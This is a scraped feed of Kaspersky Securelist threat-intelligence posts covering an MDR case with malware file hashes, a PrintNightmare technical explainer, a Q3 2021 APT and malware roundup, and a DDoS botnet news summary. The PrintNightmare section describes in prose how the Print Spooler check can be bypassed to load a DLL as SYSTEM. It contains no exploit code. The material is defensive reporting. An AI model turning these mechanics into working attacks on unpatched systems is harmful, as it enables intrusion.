\nAUTHORITY\\System:Service: \nGrandparent process command line: \nC:\\Windows\\System32\\svchost.exe -k netsvcs \nProcess integrity level: System \nProcess user SID: S-1-5-18 | Suspicious executable from C:\\programdata run as scheduled task under _System_ privileges \n \nObserved malicious files:\n\nc:\\programdata\\e.zip | 0x37630451944A1DD027F5A9B643790B10 \n---|--- \nc:\\programdata\\es.zip | 0x3319BD8B628F8051506EE8FD4999C4C3 \nc:\\programdata\\m.zip | 0xC15D90F8374393DA2533BAF7359E31F9 \nc:\\programdata\\inenglish.exe | 0xCB15B1F707315FB61E667E0218F7784D \nc:\\programdata\\english1.dll | 0x358C5061B8DF0E0699E936A0F48EAFE1 \nc:\\windows\\cluster\\resource.exe | 0x872A776C523FC33888C410081A650070 \nc:\\windows\\cluster\\twindump.dll | 0xF980FD026610E4D0B31BAA5902785EDE \n \n## Conclusion\n\nAttackers follow trends. They use any loophole to break into your corporate network. Sometimes they learn about new vulnerabilities in products earlier than security researchers do. Sometimes they hide so skillfully that their actions are indistinguishable from those of your employees or administrators.\n\nCountering targeted attacks requires extensive experience as well as constant learning. Kaspersky Managed Detection and Response delivers fully managed, individually tailored ongoing detection, prioritization, investigation, and response. 
As a result, it provides all the major benefits from having your own security operations center without having to actually set one up.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-15T10:00:42", "type": "securelist", "title": "Kaspersky Managed Detection and Response: interesting cases", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-12-15T10:00:42", "id": "SECURELIST:830DE5B1B5EBB6AEE4B12EF66AD749F9", "href": "https://securelist.com/kaspersky-managed-detection-and-response-interesting-cases/105214/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:23", "description": "\n\n## Summary\n\nLast week Microsoft warned Windows users about vulnerabilities in the Windows Print Spooler service \u2013 CVE-2021-1675 and CVE-2021-34527 (also known as PrintNightmare). Both vulnerabilities can be used by an attacker with a regular user account to take control of a vulnerable server or client machine that runs the Windows Print Spooler service. 
This service is enabled by default on all Windows clients and servers, including domain controllers.\n\nKaspersky products protect against attacks leveraging these vulnerabilities. The following detection names are used:\n\n * HEUR:Exploit.Win32.CVE-2021-1675.*\n * HEUR:Exploit.Win32.CVE-2021-34527.*\n * HEUR:Exploit.MSIL.CVE-2021-34527.*\n * HEUR:Exploit.Script.CVE-2021-34527.*\n * HEUR:Trojan-Dropper.Win32.Pegazus.gen\n * PDM:Exploit.Win32.Generic\n * PDM:Trojan.Win32.Generic\n * Exploit.Win32.CVE-2021-1675.*\n * Exploit.Win64.CVE-2021-1675.*\n\nOur detection logic also successfully blocks the attack technique from the latest Mimikatz framework v. 2.2.0-20210707.\n\nWe are closely monitoring the situation and improving generic detection of these vulnerabilities using our [Behavior Detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and Exploit Prevention components. As part of our [Managed Detection and Response service](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>), Kaspersky SOC experts are able to detect exploitation of these vulnerabilities, investigate such attacks and report to customers.\n\n## Technical details\n\n### CVE-2021-34527\n\nWhen using RPC protocols to add a new printer (_RpcAsyncAddPrinterDriver [MS-PAR] or RpcAddPrinterDriverEx [MS-RPRN]_), a client has to provide multiple parameters to the Print Spooler service:\n\n * _pDataFile_ - a path to a data file for this printer;\n * _pConfigFile_ - a path to a configuration file for this printer;\n * _pDriverPath_ - a path to a driver file that's used by this printer while it's working.\n\nThe service makes several checks to ensure _pDataFile_ and _pDriverPath_ are not UNC paths, but there is no corresponding check for _pConfigFile_, meaning the service will copy the configuration DLL to the folder _%SYSTEMROOT%\\system32\\spool\\drivers\\x64\\3\\_ (on x64 versions of the OS).\n\nNow, if the Windows Print Spooler 
service tries to add a printer again, but this time sets pDataFile to the copied DLL path (from the previous step), the print service will load this DLL because its path is not a UNC path, and the check will be successfully passed. These methods can be used by a low-privileged account, and the DLL is loaded by the _NT AUTHORITY\\SYSTEM group_ process.\n\n### CVE-2021-1675\n\nThe local version of PrintNightmare uses the same method for exploitation as CVE-2021-34527, but there's a difference in the entrypoint function (_AddPrinterDriverEx_). This means an attacker can place a malicious DLL in any locally accessible directory to run the exploit.\n\n## Mitigations\n\nKaspersky experts anticipate a growing number of exploitation attempts to gain access to resources inside corporate perimeters accompanied by a high risk of ransomware infection and data theft.\n\nTherefore, it is strongly recommended to follow Microsoft [guidelines](<https://docs.microsoft.com/en-us/defender-for-identity/cas-isp-print-spooler>) and apply the latest security updates for Windows.\n\nQuoting Microsoft (as of July 7th, 2021): \n_"Due to the possibility for exposure, domain controllers and Active Directory admin systems need to have the Print spooler service disabled. The recommended way to do this is using a Group Policy Object (GPO). 
\nWhile this security assessment focuses on domain controllers, any server is potentially at risk to this type of attack."_", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-08T05:00:06", "type": "securelist", "title": "Quick look at CVE-2021-1675 & CVE-2021-34527 (aka PrintNightmare)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-08T05:00:06", "id": "SECURELIST:0C07A61E6D92865F5B58728A60866991", "href": "https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T14:36:44", "description": "\n\n * **IT threat evolution Q3 2021**\n * [IT threat evolution in Q3 2021. PC statistics](<https://securelist.com/it-threat-evolution-in-q3-2021-pc-statistics/104982/>)\n * [IT threat evolution in Q3 2021. 
Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2021-mobile-statistics/105020/>)\n\n## Targeted attacks\n\n### WildPressure targets macOS\n\nLast March, we reported a [WildPressure campaign targeting industrial-related entities in the Middle East](<https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/>). While tracking this threat actor in spring 2021, we discovered a newer version. It contains the C++ Milum Trojan, a corresponding VBScript variant and a set of modules that include an orchestrator and three plugins. This confirms our previous assumption that there were more last-stagers besides the C++ ones.\n\nAnother language used by WildPressure is Python. The PyInstaller module for Windows contains a script named "Guard". Interestingly, this malware was developed for both Windows and macOS operating systems. The coding style, overall design and C2 communication protocol is quite recognizable across all three programming languages used by the authors.\n\nWildPressure used both virtual private servers (VPS) and compromised servers in its infrastructure, most of which were WordPress websites.\n\nWe have very limited visibility for the samples described in our report, but our telemetry suggests that the targets in this campaign were also from the oil and gas industry.\n\nYou can view our report on the new version [here](<https://securelist.com/wildpressure-targets-macos/103072/>), together with a video presentation of our findings.\n\n### LuminousMoth: sweeping attacks for the chosen few\n\nWe recently uncovered a large-scale and highly active attack against targets in Southeast Asia by a threat actor that we call [LuminousMoth](<https://securelist.com/apt-luminousmoth/103332/>). The campaign dates back to October last year and was still ongoing at the time we published our public report in July. Most of the early sightings were in Myanmar, but it seems the threat actor is now much more active in the Philippines. 
Targets include high-profile organizations: namely, government entities located both within those countries and abroad.\n\nMost APT threats carefully select their targets and tailor the infection vectors, implants and payloads to the victims' identities or environment. It's not often we observe a large-scale attack by APT threat actors \u2013 they usually avoid such attacks because they are too 'noisy' and risk drawing attention to the campaign. LuminousMoth is an exception. We observed a high number of infections, although we think the campaign was aimed at a few targets of interest.\n\nThe attackers obtain initial access to a system by sending a spear-phishing email to the victim containing a Dropbox download link. The link leads to a RAR archive that masquerades as a Word document. The archive contains two malicious DLL libraries as well as two legitimate executables that side-load the DLL files. We found multiple archives like this with file names of government entities linked to Myanmar.\n\nWe also observed a second infection vector that comes into play after the first one has successfully finished. 
The malware tries to spread to other hosts on the network by infecting USB drives.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/12153755/LuminousMoth_01.png>)

In addition to the malicious DLLs, the attackers also deployed a signed but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate data.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/12154002/LuminousMoth_05.png>)

The threat actor also deploys an additional tool that accesses a victim's Gmail session by stealing cookies from the Chrome browser.

Infrastructure ties as well as shared TTPs allude to a possible connection between LuminousMoth and the HoneyMyte threat group, which has been seen targeting the same region using similar tools in the past.

### Targeted attacks exploiting CVE-2021-40444

On September 7, [Microsoft reported a zero-day vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) (CVE-2021-40444) that could allow an attacker to execute code remotely on vulnerable computers. The vulnerability is in MSHTML, the Internet Explorer engine. Even though few people use IE nowadays, some programs use its engine to handle web content – in particular, Microsoft Office applications.

We [have seen targeted attacks](<https://securelist.com/exploitation-of-the-cve-2021-40444-vulnerability-in-mshtml/104218/>) exploiting the vulnerability to target companies in research and development, the energy sector and other major industries, banking, the medical technology sector, as well as telecoms and IT.

To exploit the vulnerability, attackers embed a special object in a Microsoft Office document containing a URL for a malicious script. If the victim opens the document, Microsoft Office downloads the script and runs it using the MSHTML engine.
Then the script can use ActiveX controls to perform malicious actions on the victim's computer.

### Tomiris backdoor linked to SolarWinds attack

The SolarWinds incident last December stood out because of the extreme carefulness of the attackers and the high-profile nature of their victims. The evidence suggests that the threat actor behind the attack, DarkHalo (aka Nobelium), had spent six months inside OrionIT's networks to perfect their attack. The following timeline sums up the different steps of the campaign.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/27145035/SAS_story_Tomiris_connection_01.png>)

In June, more than six months after DarkHalo had gone dark, we observed the DNS hijacking of multiple government zones of a CIS member state that allowed the attacker to redirect traffic from government mail servers to computers under their control – probably achieved by obtaining credentials to the control panel of the victims' registrar. When victims tried to access their corporate mail, they were redirected to a fake copy of the web interface.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/27145115/SAS_story_Tomiris_connection_02.png>)

After this, they were tricked into downloading previously unknown malware. The backdoor, dubbed Tomiris, bears a number of similarities to the second-stage malware, Sunshuttle (aka GoldMax), used by DarkHalo last year. However, there are also a number of overlaps between Tomiris and Kazuar, a backdoor that has been linked to the Turla APT threat actor. None of the similarities is enough to link Tomiris and Sunshuttle with sufficient confidence.
However, taken together they suggest the possibility of common authorship or shared development practices.

You can read our analysis [here](<https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/>).

### GhostEmperor

Earlier this year, while investigating the rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. We attribute the activity to a previously unknown threat actor that we have called [GhostEmperor](<https://securelist.com/ghostemperor-from-proxylogon-to-kernel-mode/104407/>). This cluster stood out because it used a formerly unknown Windows kernel mode rootkit that we dubbed Demodex, and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers.

The rootkit is used to hide the user mode malware's artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open-source project named Cheat Engine to bypass the Windows Driver Signature Enforcement mechanism.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/29150203/Ghost_Emperor_06.png>)

We identified multiple attack vectors that triggered an infection chain leading to the execution of the malware in memory. The majority of GhostEmperor infections were deployed on public-facing servers, as many of the malicious artefacts were installed by the httpd.exe Apache server process, the w3wp.exe IIS Windows server process, or the oc4j.jar Oracle server process.
This means that the attackers probably abused vulnerabilities in the web applications running on those systems, allowing them to drop and execute their files.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/29150042/Ghost_Emperor_04.png>)

Although infections often start with a BAT file, in some cases the known infection chain was preceded by an earlier stage: a malicious DLL that was side-loaded by wdichost.exe, a legitimate Microsoft command line utility (originally called MpCmdRun.exe). The side-loaded DLL then proceeds to decode and load an additional executable called license.rtf. Unfortunately, we did not manage to retrieve this executable, but we saw that the actions following its loading included the creation and execution of GhostEmperor scripts by wdichost.exe.

This toolset was in use from as early as July 2020, mainly targeting Southeast Asian entities, including government agencies and telecoms companies.

### FinSpy: analysis of current capabilities

At the end of September, at the Kaspersky [Security Analyst Summit](<https://thesascon.com/>), our researchers provided an [overview of FinSpy](<https://securelist.com/finspy-unseen-findings/104322/>), an infamous surveillance toolset that several NGOs have repeatedly reported being used against journalists, political dissidents and human rights activists. Our analysis included not only the Windows version of FinSpy, but also Linux and macOS versions, which share the same internal structure and features.

After 2018, we observed falling detection rates for FinSpy for Windows. However, it never actually went away – it was simply using various first-stage implants to hide its activities.
We started detecting some suspicious backdoored installer packages (including TeamViewer, VLC Media Player and WinRAR); then in the middle of 2019 we found a host that served these installers along with FinSpy Mobile implants for Android.

The authors have gone to great lengths to make FinSpy inaccessible to security researchers – it seems they have put as much work into anti-analysis and obfuscation as they have into the Trojan itself. First, the samples are protected with multiple layers of evasion tactics.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/24151828/SAS_story_FinFisher_02.png>)

Moreover, once the Trojan has been installed, it is heavily camouflaged using four complex, custom-made obfuscators.

Apart from Trojanized installers, we also observed infections involving use of a UEFI (Unified Extensible Firmware Interface) and MBR (Master Boot Record) bootkit. While the MBR infection has been known since at least 2014, details on the UEFI bootkit were publicly revealed for the first time in our private report on FinSpy.

The user of a smartphone or tablet can be infected through a link in a text message. In some cases (for example, if the victim's iPhone has not been [jailbroken](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)), the attacker may need physical access to the device.

## Other malware

### REvil attack on MSPs and their customers worldwide

An attack perpetrated by the REvil Ransomware-as-a-Service gang (aka Sodinokibi) targeting Managed Service Providers (MSPs) and their clients was discovered on July 2.

The attackers [identified and exploited](<https://threatpost.com/kaseya-patches-zero-day-exploits/167548/>) a zero-day vulnerability in the Kaseya Virtual System/Server Administrator (VSA) platform.
The VSA software, used by Kaseya customers to remotely monitor and manage software and network infrastructure, is supplied either as a cloud service or via on-premises VSA servers.

The exploit involved deploying a malicious dropper via a PowerShell script. The script disabled Microsoft Defender features and then used the certutil.exe utility to decode a malicious executable (agent.exe) that dropped an older version of Microsoft Defender, along with the REvil ransomware packed into a malicious library. That library was then loaded by the legitimate MsMpEng.exe by utilizing the DLL side-loading technique.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/05113533/02-revil-attacks-msp.png>)

The attack is estimated to have resulted in the encryption of files belonging to around 60 Kaseya customers using the on-premises version of the platform. Many of them were MSPs who use VSA to manage the networks of other businesses. This MSP connection gave REvil access to those businesses, and Kaseya estimated that [around 1,500 downstream businesses were affected](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-2nd-2021>).

Using our Threat Intelligence service, we observed more than 5,000 attack attempts in 22 countries by the time [our analysis of the attack](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>) was published.

### What a [Print]Nightmare

Early in July, Microsoft published an alert about vulnerabilities in the Windows Print Spooler service. The vulnerabilities, [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>) and [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>) (aka PrintNightmare), can be used by an attacker with a regular user account to take control of a vulnerable server or client machine that runs the Windows Print Spooler service.
This service is enabled by default on all Windows clients and servers, including domain controllers, making both vulnerabilities potentially very dangerous.

Moreover, owing to a misunderstanding between teams of researchers, a [proof-of-concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (PoC) exploit for PrintNightmare was [published](<https://therecord.media/poc-released-for-dangerous-windows-printnightmare-bug/>) online. The researchers involved believed that Microsoft's Patch Tuesday release in June had already solved the problem, so they shared their work with the expert community. However, while Microsoft had published a patch for CVE-2021-1675, the PrintNightmare vulnerability remained unpatched until July. The PoC was quickly removed, but not before it had been copied multiple times.

CVE-2021-1675 is a [privilege elevation](<https://encyclopedia.kaspersky.com/glossary/privilege-escalation/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) vulnerability, allowing an attacker with low access privileges to craft and use a malicious DLL file to run an exploit and gain higher privileges.
However, that is only possible if the attacker already has direct access to the vulnerable computer in question.

CVE-2021-34527 is significantly more dangerous because it is a [remote code execution](<https://encyclopedia.kaspersky.com/glossary/remote-code-execution-rce/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (RCE) vulnerability, which means it allows remote injection of DLLs.

You can find a more detailed technical description of both vulnerabilities [here](<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>).

### Grandoreiro and Melcoz arrests

In July, the Spanish Ministry of the Interior [announced](<http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853>) the arrest of 16 people connected to the [Grandoreiro and Melcoz (aka Mekotio) cybercrime groups](<https://securelist.com/arrests-of-members-of-tetrade-seed-groups-grandoreiro-and-melcoz/103366/>). Both groups are originally from Brazil and form part of the [Tetrade umbrella](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>), operating for a few years now in Latin America and Western Europe.

The Grandoreiro banking Trojan malware family initially operated in Brazil, then expanded to other Latin American countries and later to Western Europe. The group has regularly improved its techniques, and, based on our analysis of the group's campaigns, it operates as a [malware-as-a-service (MaaS)](<https://encyclopedia.kaspersky.com/glossary/malware-as-a-service-maas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) project.
Our telemetry shows that, since January 2020, Grandoreiro has mainly attacked victims in Brazil, Mexico, Spain, Portugal and Turkey.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/14175031/tetrade_arrest_01.png>)

Melcoz had been active in Brazil since at least 2018, before expanding overseas. We observed the group attacking assets in Chile in 2018 and, more recently, in Mexico: it's likely that there are victims in other countries too, as some of the targeted banks have international operations. As a rule, the malware uses AutoIt or VBS scripts, added into MSI files, which run malicious DLLs using the DLL-Hijack technique, aiming to bypass security solutions. The malware steals passwords from browsers and from the device's memory, providing remote access to capture internet banking access. It also includes a Bitcoin wallet stealing module. Our telemetry confirms that, since January 2020, Melcoz has been actively targeting Brazil, Chile and Spain, among other countries.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/14175038/tetrade_arrest_02.png>)

Since both malware families are from Brazil, the individuals arrested in Spain are just operators. So, it's likely that the creators of Grandoreiro and Melcoz will continue to develop new malware techniques and recruit new members in their countries of interest.

### Gamers beware

Earlier this year, we discovered an ad in an underground forum for a piece of malware dubbed BloodyStealer by its creators.
The malware is designed to steal passwords, cookies, bank card details, browser auto-fill data, device information, screenshots, desktop and client uTorrent files, Bethesda, Epic Games, GOG, Origin, Steam, Telegram, and VimeWorld client sessions and logs.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141037/bloodystealer-and-gaming-accounts-in-darknet-screen-1.png>)

**_The BloodyStealer ad (Source: [https://twitter.com/3xp0rtblog](<https://twitter.com/3xp0rtblog/status/1380087553676697617>))_**

The authors of the malware, which has hit users in Europe, Latin America and the Asia-Pacific region, have adopted a MaaS distribution model, meaning that anyone can buy it for the modest price of around $10 per month (roughly $40 for a "lifetime license").

On top of its theft functions, the malware includes tools to thwart analysis. It sends stolen information as a ZIP archive to the C2 (command-and-control) server, which is protected against DDoS (distributed denial of service) attacks. The cybercriminals use either the (quite basic) control panel or Telegram to obtain the data, including gamer accounts.

BloodyStealer is just one of many tools available on the dark web for stealing gamer accounts. Moreover, underground forums often feature ads offering to post a malicious link on a popular website or selling tools to generate phishing pages automatically. Using these tools, cybercriminals can collect, and then try to monetize, a huge amount of credentials. All kinds of offers related to gamer accounts can be found on the dark web.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141127/bloodystealer-and-gaming-accounts-in-darknet-screen-2.png>)

So-called logs are among the most popular. These are databases containing reams of data for logging into accounts.
In their ads, attackers can specify the types of data, the geography of users, the period over which the logs were collected and other details. For example, in the screenshot below, an underground forum member offers an archive with 65,600 records, of which 9,000 are linked to users from the US, and 5,000 to residents of India, Turkey and Canada. The entire archive costs $150 (that's about 0.2 cents per record).

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141203/bloodystealer-and-gaming-accounts-in-darknet-screen-3.png>)

Cybercriminals can also use compromised gaming accounts to launder money, distribute phishing links and conduct other illegal business.

You can read more about gaming threats, including BloodyStealer, [here](<https://securelist.com/game-related-cyberthreats/103675/>) and [here](<https://securelist.com/bloodystealer-and-gaming-assets-for-sale/104319/>).

### Triada Trojan in WhatsApp mod

Not everyone is happy with the official WhatsApp app, turning instead to modified WhatsApp clients for features that the WhatsApp developers haven't yet implemented in the official version. The creators of these mods often embed ads in them. However, their use of third-party ad modules can provide a mechanism for malicious code to be slipped into the app unnoticed.

This happened recently with FMWhatsApp, a popular WhatsApp mod. In version 16.80.0 the developers used a third-party ad module that includes the Triada Trojan (detected by Kaspersky's mobile antivirus as Trojan.AndroidOS.Triada.ef). This Trojan performs an intermediary function. First, it collects data about the user's device, and then, depending on the information, it downloads one of several other Trojans.
You can find a description of the functions that these other Trojans perform in [our analysis of the infected FMWhatsApp mod](<https://securelist.com/triada-trojan-in-whatsapp-mod/103679/>).

### Qakbot banking Trojan

QakBot (aka QBot, QuackBot and Pinkslipbot) is a banking Trojan that was first discovered in 2007, and has been continually maintained and developed since then. It is now one of the leading banking Trojans around the globe. Its main purpose is to steal banking credentials (e.g., logins, passwords, etc.), but it has also acquired functionality allowing it to spy on financial operations, spread itself and install ransomware in order to maximize revenue from compromised organizations.

The Trojan also includes the ability to log keystrokes, backdoor functionality, and techniques to evade detection. The latter includes virtual environment detection, regular self-updates and cryptor/packer changes. QakBot also tries to protect itself from being analyzed and debugged by experts and automated tools. Another interesting piece of functionality is the ability to steal emails: these are later used by the attackers to send targeted emails to the victims, with the information obtained used to lure victims into opening those emails.

QakBot is known to infect its victims mainly via spam campaigns. In some cases, the emails are delivered with Microsoft Office documents or password-protected archives with documents attached. The documents contain macros and victims are prompted to open the attachments with claims that they contain important information (e.g., an invoice). In some cases, the emails contain links to web pages distributing malicious documents.

However, there is another infection vector that involves a malicious QakBot payload being transferred to the victim's machine via other malware on the compromised machine.
The initial infection vectors may vary depending on what the threat actors believe has the best chance of success for the targeted organization(s). It's known that various threat actors perform reconnaissance of target organizations beforehand to decide which infection vector is most suitable.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/01145837/Qakbot_technical_analysis_01.png>)

We analyzed statistics on QakBot attacks collected from our Kaspersky Security Network (KSN), where anonymized data voluntarily provided by Kaspersky users is accumulated and processed. In the first seven months of 2021 our products detected 181,869 attempts to download or run QakBot. This number is lower than the detection number from January to July 2020, though the number of users affected grew by 65% – from 10,493 in the previous year to 17,316 this year.

_Number of users affected by QakBot attacks from January to July in 2020 and 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/01155141/01-en-qakbot.png>))_

You can read our full analysis [here](<https://securelist.com/qakbot-technical-analysis/103931/>).

_Source: "IT threat evolution Q3 2021", Securelist, published 2021-11-26, https://securelist.com/it-threat-evolution-q3-2021/104876/ (CVEs referenced: CVE-2021-1675, CVE-2021-34527, CVE-2021-40444)._

## News roundup

Q4 2021 saw the appearance of several new DDoS botnets. A zombie network, [named Abcbot](<https://securityaffairs.co/wordpress/124542/security/abcbot-ddos-botnet-linux.html>) by researchers, first hit the radar in July, but at the time it was little more than a simple scanner attacking Linux systems by brute-forcing weak passwords and exploiting known vulnerabilities. In October, the botnet was upgraded with DDoS functionality. Then in December, researchers at Cado Security linked the botnet to the Xanthe [cryptojacking](<https://encyclopedia.kaspersky.com/glossary/cryptojacking/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) group. This is further evidence that the same botnets are often used for mining and DDoS.

The EwDoor botnet, which first came to researchers' attention in late October, [turned out to be more picky](<https://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/>) than Abcbot. This zombie network consists solely of EdgeMarc Enterprise Session Border Controller devices located on AT&T carrier networks. The bot infiltrated the devices through the [CVE-2017-6079](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6079>) vulnerability, which allows execution of arbitrary commands.
By exploiting a bug in the bot itself (one of the first versions accessed a non-existent C2 server registered by researchers), Netlab 360 managed to detect 5,700 infected devices. However, the cybercriminals later severed communication with this server. AT&T is [investigating](<https://therecord.media/att-takes-action-against-ddos-botnet-that-hijacked-voip-servers/>) attacks on EdgeMarc devices.

In November, Qrator Labs [recorded](<https://habr.com/ru/company/qrator/blog/593741/>) a series of short but powerful attacks on its systems and those of its clients. The attackers used a TCP data flood: they established a TCP connection to the victim's server, then flooded it with random heavy TCP packets. In some cases, DNS amplification was also used. The attacks, launched from thousands of cameras and routers, lasted 2–3 minutes and then stopped. Researchers note that the botnet is new, and they currently lack sufficient data to describe it. They also speculate that the short attack duration is because the attackers wish to remain undetected, so they do not borrow infected device users' communication channels for long.

Google's Damian Menscher discovered a zombie network consisting of [vulnerable GitLab servers](<https://www.techtarget.com/searchsecurity/news/252509093/DDoS-botnet-exploiting-known-GitLab-vulnerability>). The botnet hijacked new devices by exploiting the [CVE-2021-22205](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22205>) vulnerability, which GitLab patched in April 2021, and carried out DDoS attacks of over 1TB/s. Menscher does not specify whether the bot is entirely new or related to existing botnets. However, around the same time, Cloudflare [reported](<https://blog.cloudflare.com/cloudflare-blocks-an-almost-2-tbps-multi-vector-ddos-attack/>) a brief but powerful Mirai-type attack, involving, among other things, GitLab servers infected through CVE-2021-22205.

Known botnets made the news more than once in Q4.
For instance, Moobot added a [relatively fresh vulnerability](<https://threatpost.com/moobot-botnet-hikvision-surveillance-systems/176879/>) to its arsenal. A bug designated as [CVE-2021-36260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36260>) was found in some Hikvision camera models and patched in September 2021. Like CVE-2017-6079, this vulnerability allows attackers to execute arbitrary commands. Once on the device, Moobot waits for a command from the C2 server before launching a DDoS attack. Researchers link the campaign to a DDoS-as-a-Service provider whose Telegram channel they came across during their analysis. The channel was created in June and went live in August 2021.

The Mēris botnet discovered [last quarter](<https://securelist.com/ddos-attacks-in-q3-2021/104796/>) turned out to be two botnets, reports Netscout. The company named the second one [Dvinis](<https://www.netscout.com/blog/asert/tale-two-botnets>) ("twin" in Latvian). Unlike its elder brother, it does not use HTTP pipelining, but is also deployed in high-power attacks. Moreover, according to Netscout, Dvinis accounts for 75% of all attacks attributed to Mēris.

In late 2021, news broke of a [vulnerability in the Apache Log4j library](<https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/>), which laid claim to being the most dangerous vulnerability of the year. Log4Shell, as the vulnerability is called, is present in all versions of Log4j from 2.0-beta9 to 2.14.1, and allows an attacker to take full control over a vulnerable system. What's more, an exploit for the vulnerability is available online, and the library that contains it is used in millions of products, both commercial and open-source. Not surprisingly, [many cybercriminals](<https://www.securityweek.com/ransomware-trojans-ddos-malware-and-crypto-miners-delivered-log4shell-attacks>), including DDoS botnet developers, have added Log4Shell to their toolkit.
In particular, [Mirai](<https://fidelissecurity.com/threatgeek/archive/observations-from-a-log4j-decoy-from-vulnerability-to-infection-to-ddos-in-record-time/>), [Muhstik](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) and Elknot bots are trying to exploit this vulnerability.

